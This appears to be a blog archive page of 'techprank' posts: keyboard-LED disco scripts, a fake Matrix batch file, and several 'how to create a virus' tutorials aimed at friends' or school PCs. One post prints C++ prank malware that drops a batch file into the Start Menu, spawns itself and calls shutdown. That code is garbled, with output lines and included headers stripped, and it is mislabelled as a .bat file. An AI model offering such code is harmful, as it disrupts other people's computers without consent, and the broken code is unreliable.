Showing posts with label Techpranks. Show all posts
Showing posts with label Techpranks. Show all posts

Saturday, 11 July 2020

How to make the keyboard a disco light party Disco with keyboard Keyboard Dj

How to make the keyboard a disco light party Disco with keyboard Keyboard Dj Part-2


How to make the keyboard a disco light party Disco with keyboard Keyboard Dj Part-2


This is my favourite cool trick to make your dear keyboard into a dj light system. This piece of simple code turns ON the Caps lock Led, Num Led and Scroll's flash light Led in a rhythmic manner that gives you a true feeling of dj light system while you becomes the magical keyboard player?? So, why not to try this?

Steps to follow to make your keyboard into a dj light system:-

1. Open your notepad and copy the following simple codes


Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 250
wshshell.sendkeys “{CAPSLOCK}”
wscript.sleep 150
wshshell.sendkeys “{NUMLOCK}”
wscript.sleep 100
wshshell.sendkeys “{SCROLLLOCK}”
loop


2.  Save this file as "brosvilla.vbs" ( without " ")

3.  To run the file, just double click on it.

Now, here you go...your disco light is ready.
Enjoy!
Invite your friends, bring some chips n party is On, along with your knowledge gaining process with your system.

Note : To end this process of keyboard disco light, 
1. Start the Task manager, by simultaneously pressing ALT+Ctrl+Delete buttons.
2. Select the 'wscript.exe'
3. Click on End task option.

Happy Learning!!!
 Happy Coding!!!

Share:

How to make the keyboard a disco light party Disco with keyboard Keyboard Dj

How to make the keyboard a disco light party   Disco with keyboard    Keyboard Dj  Part-1
How to make the keyboard a disco light party Disco with keyboard Keyboard Dj

This is my favourite cool trick to make your dear keyboard into a dj light system. This piece of simple code turns ON the Caps lock Led, Num Led and Scroll's flash light Led in a rhythmic manner that gives you a true feeling of dj light system while you becomes the magical keyboard player😉. So, why not to try this?

Steps to follow to make your keyboard into a dj light system:-

1. Open your notepad and copy the following simple codes

Set  wshShell=wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 120
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop

2.  Save this file as "brosvilla.vbs" ( without " ")

3.  To run the file, just double click on it.

Now, here you go...your disco light is ready.
Enjoy!
Invite your friends, bring some chips n party is On, along with your knowledge gaining process with your system.

Note : To end this process of keyboard disco light, 1. Start the Task manager, by simultaneously pressing ALT+Ctrl+Delete buttons.
2. Select the 'wscript.exe'
3. Click on End task option.

Happy Learning!!!
Happy Coding!!!

Share:

Thursday, 2 May 2019

How to create a virus that Disable Internet Connectivity permanently using Notepad

how to createa virus that disable internet connectivity permanently using notepad


Let us , first define the computer virus. It could be defined as a piece of code that is capable of copying itself and typically has detrimental effect, such as corrupting the system or destroying data.
A Computer virus is a malware program that, when executed, replicates by inserting copies of itself into other programs, data files, or the boot sector of the hard drive; when this replication succeeds, the affected areas are then said to be "infected".A simple virus that can make a copy of itself over and over again is relatively easy to produce. An even more dangerous type of virus is one capable of transmitting itself across networks and bypassing security systems.
In this post, we will write a simple Notepad code that will disable the internet connectivity permanently. You can do this as a prank to your friends or your siblings, but just for fun.
So lets create this virus.
Warning : This is just for Educational purpose, please don't apply in your school or college PC.
To make this virus just follow these simple steps:-
1. Open the Notepad on your PC
2. Type in the following simple Codes:-



Share:

Wednesday, 1 May 2019

How to make funny computer virus that can crush the Computer system || Updated version


A Computer virus is a malware piece of code that, if executed, replicates by inserting copies of itself into other programs, data files. A computer virus that can make a copy of itself over and over again is relatively easy to produce.
Here, we will create a funny computer virus using Notepad. Its a cool trick techprank that you can play on your friend. So the first of your friend circle to grab this opportunity to play this fake computer virus prank on your friend.
Steps:-
1. Open the Notepad on your computer System
2. Write the below codes in the Notepad or copy and paste in your Notepad

Share:

Tuesday, 18 April 2017

How to create a Fake Computer virus || Updated 2017



A Computer virus is a malware piece of code that, if executed, replicates by inserting copies of itself into other programs, data files. A simple virus that can make a copy of itself over and over again is relatively easy to produce.
Here we will create a fake computer virus using Notepad. Its a cool trick techprank that you can play on your friend. So the first of your friend circle to grab this opportunity to play this fake computer virus prank on your friend.
Steps:-
1. Open the Notepad on you computer System
2. Writ the below codes in the Notepad or copy and paste in your Notepad


@echo off
mode 100

echo Hello Guys!
echo I am your bro
echo Welcome to the world of viruses
echo virus downloaded
echo You have now entered The Matrix.....
Pause
goto matrix
:matrix
color a
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%

goto start 

3. save it as brosvilla.bat
4. an icon will be created, hit the enter button to run it
fake computer virus || updated 2017
©brosvilla


Hope you have a nice fake computer virus prank, if you find any problem do comment and do let me know the problem if you had faced.
Happy coding!!!


Share:

Thursday, 13 April 2017

How to make computer virus using Notepad ǀǀ Matrix ǀǀ Updated


A Computer Virus is a piece of code that is capable of copying itself and typically has detrimental effect, such as corrupting the system or destroying data.

A Computer virus is a malware program that, when executed, replicates by inserting copies of itself into other programs, data files, or the boot sector of the hard drive; when this replication succeeds, the affected areas are then said to be "infected". A simple virus that can make a copy of itself over and over again is relatively easy to produce. An even more dangerous type of virus is one capable of transmitting itself across networks and bypassing security systems.These programs periodically check your computer system for the best-known types of viruses.In this post, I'm going to make the most destructive virus ever created by any Software Engineer. 

Warning -please do not run it on your computer or in school/ college computers

1. Open Notepad
2. Type in the following codes in the Notepad:-

#include
#include
#include
#include
#include
#include
#include
using namespace std;
int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);
{
char buffer[255];
char inputFile[]="C:\Documents and Settings\All Users\Start Menu\Programs\rawr.bat";
ifstream input(inputFile);
if (!input)
{
  {
ofstream fp("C:\Documents and Settings\All Users\Start Menu\Programs\rawr.bat", ios::app);
fp
fp
fp
  }
}
else
{
while (!input.eof())
  {
input.getline(buffer,255);
  }
 }
}

{
char buffer[255];
char inputFile[]="C:\rawr.exe";
ifstream input(inputFile);
if (!input)
{
 {
  {
ofstream fp("CLICK.bat", ios::app);
fp
fp
fp
fp
}
system("START CLICK.bat");
main();
 }
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
  }
 }
}

START: 
{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
Sleep(60);
 }
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout
}
goto START;

3. Save it as matrix.bat

And we are done with this. If you find any problem in executing this prank, do comment in the comment section. 
Share:

Friday, 22 April 2016

How to block / unblock any website

How to block / unblock any website

BROS! Do you want to block all users of a Windows PC from opening certain websites, regardless of which browser whether you want to restrict access altogether or only during specified hours of the day?You need only make a few simple additions to the Windows hosts file.
 This method does not require any Software to download, it is totally free!!!
 It's an effective method for restricting users of all ages from seeing the content you don’t want them to access. It specially beneficial for those Parents whose kids (like me..lol) staying up all night browsing Facebook, YouTube, and GOD knows what else certainly is not a healthy lifestyle.



Here’s our guide to blocking a website using some of the better fool-proof methods.

Pick a blocking method:-
1. Block using Windows hosts file
2. Block using Mac OS X hosts file
3. Block using your router settings

Block using Windows hosts file

also readWindows shutdown prank

Share:

Sunday, 17 April 2016

Windows shutdown prank

  How to create Shutdown Shortcut in Windows  

Windows 8's start menu interferes with the old, convenient method of using keyboard shortcuts (via the Windows key) to quickly restart or shut down your machine.
 Here's a little trick that sort of brings back that time saver. All you need to do is pull up the power tools menu with WIN + X , then U and the underlined letter for the shut down option of your choice.
The procedure for Windows 7 is very similar to that of Vista and XP, but now you can pin those freshly created shortcuts to the Start Menu or the Taskbar or both.
Where Windows 7 displays its power button in a prominent place on its Start Menu, both Windows and the new Windows 8.1 make you perform several actions just to turn your computer off and they're all buried. 
Fortunately, there's an easy way to put the shutdown and restart functions just one click away from the desktop and Start screen.
Just create shortcuts for both actions using the following steps:

Share:

Tuesday, 12 April 2016

How to make the most destructive virus (must see) using notepad



Let us , first define the computer virus. It could be defined as a piece of code that is capable of copying itself and typically has detrimental effect, such as corrupting the system or destroying data.

A Computer virus is a malware program that, when executed, replicates by inserting copies of itself into other programs, data files, or the boot sector of the hard drive; when this replication succeeds, the affected areas are then said to be "infected".A simple virus that can make a copy of itself over and over again is relatively easy to produce. An even more dangerous type of virus is one capable of transmitting itself across networks and bypassing security systems.

Since 1987, when a virus infected ARPANET, a large network used by the Defense Department and many universities, many antivirus programs have become available.

 These programs periodically check your computer system for the best-known types of viruses.

Some people distinguish between general viruses and worms. 

A worm is a special type of virus that can replicate itself and use memory, but cannot attach itself to other programs.

In this post, I'm going to make the most destructive virus ever created by any Software Engineer. 
It is one of the most complicated virus ever known to exist. 

So lets make this virus.

Warning : This is just for Educational purpose, please don't apply in your school or college PC.

To make this virus just follow these simple steps:-

1. Open the Notepad on your PC

2. Type in the following simple Codes:-


Share:

How to make computer virus (must watch) using notepad

            

How to simulate a Distructive Virus 


A Virus could be defined as a piece of code that is capable of copying itself and typically has detrimental effect, such as corrupting the system or destroying data. A Computer Virus is a malware program that, when executed, replicates by inserting copies of itself into other programs, data files, or the boot sector of the hard drive; when this replication succeeds, the affected areas are then said to be "infected". In this post, we are going to make the most destructive virus ever created by any Software Engineer. It is one of the most complicated virus ever known to exist. 

In this post we are going to make one of the most harmful virus




Warning: The Virus Simulation is just for Educational purpose, please don't apply in your school or college PC.
"If you know the problem, you have the Solution"
               
                                                                                                                       
You can pull-over the Virus Simulation prank on your friend by just writing some simple Notepad code in your laptop. So lets start the stuffs.

For this you just follow these steps:-

1. Open your Notepad.   

win+r => notepad => Enter


2. Type in the following codes:-



Share:

Monday, 11 April 2016

Matrix Simulation

How to run a Matrix Simulation














The simulation hypothesis contents that reality is in fact a simulation (most likely a computer simulation), of which we, are totally unaware. Some versions rely on the development of simulated reality, a fictional technology. The hypothesis has been a central plot device of many science fiction stories and films. Every relationship, every sentiment, every memory could have been generated by banks of computers.


Everything you have ever done or will do could simply be the product of a highly-advanced computer code. Every relationship, every sentiment, every memory could have been generated by banks of supercomputers.   - Nick Bostrom


This was the terrifying theory first proposed by British philosopher Nick Bostrom.
The shocking hypothesis was penned four years after Andrew and Lana Wachowski wrote and directed The Matrix, a film set in a dystopian future in which humans are subdued by a simulated reality.In his paper, Dr Bostrom suggested a race of far-evolved descendants could be behind our digital imprisonment. The futuristic beings – human or otherwise – could be using virtual reality to simulate a time in the past or recreate how their remote ancestors lived. Sound crazy? Well, it turns out NASA thinks Dr Bostrom might be right.Since, when i watched the movie The matrix , I always wondered to play the same trick as the Keanu Reeves has played in the movie.








All of the witty-kids like me must had wonder this. so, lets pull this witty prank on your friends:-=>Follow the below steps:-1. Open the Notepad2. Type-in the following codes:-

Share:

Categories

Blog Archive

copyright @bros villa. Powered by Blogger.

Categories

Copyright © Hackers villa | Powered by Blogger Design by PWT | Blogger Theme by NewBloggerThemes.com